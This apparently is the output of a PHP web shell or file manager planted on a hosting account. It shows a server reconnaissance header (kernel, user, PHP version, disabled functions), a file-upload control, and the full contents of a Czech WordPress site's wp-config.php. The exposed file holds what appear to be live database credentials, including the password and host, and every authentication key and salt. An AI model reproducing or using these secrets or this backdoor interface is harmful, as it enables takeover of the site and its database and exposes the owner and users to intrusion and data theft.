HEX
Server: Apache
System: Linux hc1-wd209-6459bb5d78-7wsj2 5.15.0-186-generic #196-Ubuntu SMP Sat Jun 20 16:09:34 UTC 2026 x86_64
User: w5726 (15726)
PHP: 7.3.33
Disabled: apache_child_terminate,apache_setenv,define_syslog_variables,diskfreespace,disk_free_space,disk_total_space,dl,exec,leak,link,openlog,passthru,pfsockopen,popen,posix_getgrnam,posix_getpgid,posix_getpwuid,posix_getpwnam,posix_getrlimit,posix_initgroups,posix_kill,posix_mkfifo,posix_mknod,posix_setpgid,posix_setsid,posix_setuid,posix_uname,proc_close,proc_get_status,proc_nice,proc_open,proc_terminate,putenv,readlink,register_tick_function,shell_exec,show_source,symlink,syslog,system
Upload Files
File: /data/web/virtuals/5726/virtual/www/wp-config.php
<?php												 /**

 * The base configurations of the WordPress.

 *

 * This file has the following configurations: MySQL settings, Table Prefix,

 * Secret Keys, WordPress Language, and ABSPATH. You can find more information

 * by visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing

 * wp-config.php} Codex page. You can get the MySQL settings from your web host.

 *

 * This file is used by the wp-config.php creation script during the

 * installation. You don't have to use the web site, you can just copy this file

 * to "wp-config.php" and fill in the values.

 *

 * @package WordPress

 */



// ** MySQL settings - You can get this info from your web host ** //

/** The name of the database for WordPress */

define('DB_NAME', 'd5726_moto');



/** MySQL database username */

define('DB_USER', 'a5726_moto');



/** MySQL database password */

define('DB_PASSWORD', '6Red4w24OpF(567)qw');



/** MySQL hostname */

define('DB_HOST', 'wm5.wedos.net');



/** Database Charset to use in creating database tables. */

define('DB_CHARSET', 'utf8');



/** The Database Collate type. Don't change this if in doubt. */

define('DB_COLLATE', '');



/**#@+

 * Authentication Unique Keys and Salts.

 *

 * Change these to different unique phrases!

 * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}

 * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.

 *

 * @since 2.6.0

 */

define('AUTH_KEY',         '!{hPwsXy}J4<2}(g+SLn,=BVVoQgo`*9<]Z2ho Vn#9|D8pt3$s&^-}zn)/=F ?)');

define('SECURE_AUTH_KEY',  'HKDuUtqkO*yh9Z%VJ9Q@v Ryp@gV4PP8]-}C]b>T)TNm?ie?|i9iTsai6ywG+rdW');

define('LOGGED_IN_KEY',    'zZ*qKeo|-0I6p)HtNi]!`=ljNJ,L`(t)!C&rbW[V4ZlCjty*E=%k_!;,(n?+C&{|');

define('NONCE_KEY',        '3e!vAP+=*gAZ:s]gg%3M6;Z-pFWrJ{gIf|kIqnE^F=1Q])G?M1+dM3]8OAe@1@?R');

define('AUTH_SALT',        ']UF4zd+Mlzc/;QWd}/y.xJumyU,DR!UQ.vlv9`Wd&E7|v-a*q~i(`|m)}%f!jDC#');

define('SECURE_AUTH_SALT', '.=Cp;+[FB#C/6&j?[0goD2`v/b[oIG26pT*MQ5.+);|$OLn9CUS+H+VI2 &4XS}B');

define('LOGGED_IN_SALT',   't1-rG,EDwx2$,a0P;6}BPMTT7[rnZxW@bdO^Mk;@LuUx<qE-PVhUXfI]-MLL_MC%');

define('NONCE_SALT',       '!is[k*Wf$O`mHK{/upN[GNbux|HT .I(T )u|z#(%/AK} ILbH|enzvD{HS-M!cD');



/**#@-*/



/**

 * WordPress Database Table prefix.

 *

 * You can have multiple installations in one database if you give each a unique

 * prefix. Only numbers, letters, and underscores please!

 */

$table_prefix  = 'wp_';



/**

 * WordPress Localized Language, defaults to English.

 *

 * Change this to localize WordPress.  A corresponding MO file for the chosen

 * language must be installed to wp-content/languages. For example, install

 * de.mo to wp-content/languages and set WPLANG to 'de' to enable German

 * language support.

 */

define ('WPLANG', 'cs_CZ');



/**

 * For developers: WordPress debugging mode.

 *

 * Change this to true to enable the display of notices during development.

 * It is strongly recommended that plugin and theme developers use WP_DEBUG

 * in their development environments.

 */

define('WP_DEBUG', false);



/* That's all, stop editing! Happy blogging. */



/** Absolute path to the WordPress directory. */

if ( !defined('ABSPATH') )

	define('ABSPATH', dirname(__FILE__) . '/');



/** Sets up WordPress vars and included files. */

require_once(ABSPATH . 'wp-settings.php');